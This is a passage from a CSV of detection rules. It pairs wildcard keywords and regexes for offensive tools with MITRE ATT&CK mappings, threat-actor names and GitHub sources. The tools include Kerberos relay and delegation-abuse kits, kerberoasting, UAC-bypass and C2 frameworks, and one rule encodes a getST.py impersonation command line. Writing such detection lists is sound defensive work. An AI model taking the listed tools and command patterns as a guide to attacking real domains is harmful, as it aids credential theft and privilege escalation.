Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_s4u /*",".{0,1000}krb_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_tgtdeleg /*",".{0,1000}krb_tgtdeleg\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_tgtdeleg(*)*",".{0,1000}krb_tgtdeleg\(.{0,1000}\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_triage /*",".{0,1000}krb_triage\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb2john.py*",".{0,1000}krb2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*krb5/kerberosv5.py*",".{0,1000}krb5\/kerberosv5\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *",".{0,1000}KRB5CCNAME\=.{0,1000}\.ccache.{0,1000}\sgetST\.py\s\-self\s\-impersonate\s.{0,1000}\s\-k\s\-no\-pass\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*krb5decoder*",".{0,1000}krb5decoder.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*krb5-enum-users *",".{0,1000}krb5\-enum\-users\s.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*krb5-enum-users.*",".{0,1000}krb5\-enum\-users\..{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*krbasktgt /*",".{0,1000}krbasktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krbcredccache.py*",".{0,1000}krbcredccache\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*krbjack -*",".{0,1000}krbjack\s\-.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*krbjack.tcpforward*",".{0,1000}krbjack\.tcpforward.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates 
abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*krbjacker.py*",".{0,1000}krbjacker\.py.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*krbjack-main*",".{0,1000}krbjack\-main.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*KrbRelay*misc*",".{0,1000}KrbRelay.{0,1000}misc.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay*smb*",".{0,1000}KrbRelay.{0,1000}smb.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay*spoofing*",".{0,1000}KrbRelay.{0,1000}spoofing.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.Clients.Attacks*",".{0,1000}KrbRelay\.Clients\.Attacks.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelay.csproj*",".{0,1000}KrbRelay\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelay.sln*",".{0,1000}KrbRelay\.sln.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelayUp - Relaying you to SYSTEM*",".{0,1000}KrbRelayUp\s\-\sRelaying\syou\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KrbRelayUp.csproj*",".{0,1000}KrbRelayUp\.csproj.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KrbRelayUp.DSInternals.Common.Properties*",".{0,1000}KrbRelayUp\.DSInternals\.Common\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelayUp.lib*",".{0,1000}KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelayUp/1.0*",".{0,1000}KrbRelayUp\/1\.0.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","user-agent","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*krbrelayx*",".{0,1000}krbrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbrelayx.git*",".{0,1000}krbrelayx\.git.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbrelayx.py -*",".{0,1000}krbrelayx\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*krbrelayx.py*",".{0,1000}krbrelayx\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbrelayx-master*",".{0,1000}krbrelayx\-master.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" 
"*krbroast-pcap2hashcat.py*",".{0,1000}krbroast\-pcap2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*KRBSCM: Will use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM*",".{0,1000}KRBSCM\:\sWill\suse\sthe\scurrently\sloaded\sKerberos\sService\sTicket\sto\screate\sa\snew\sservice\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KRBUACBypass 1*",".{0,1000}KRBUACBypass\s1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.csproj*",".{0,1000}KRBUACBypass\.csproj.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.exe*",".{0,1000}KRBUACBypass\.exe.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.sln*",".{0,1000}KRBUACBypass\.sln.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*ktsuss-lpe.sh*",".{0,1000}ktsuss\-lpe\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*kubeletAttack.json*",".{0,1000}kubeletAttack\.json.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Kubesploit Agent*",".{0,1000}Kubesploit\sAgent.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 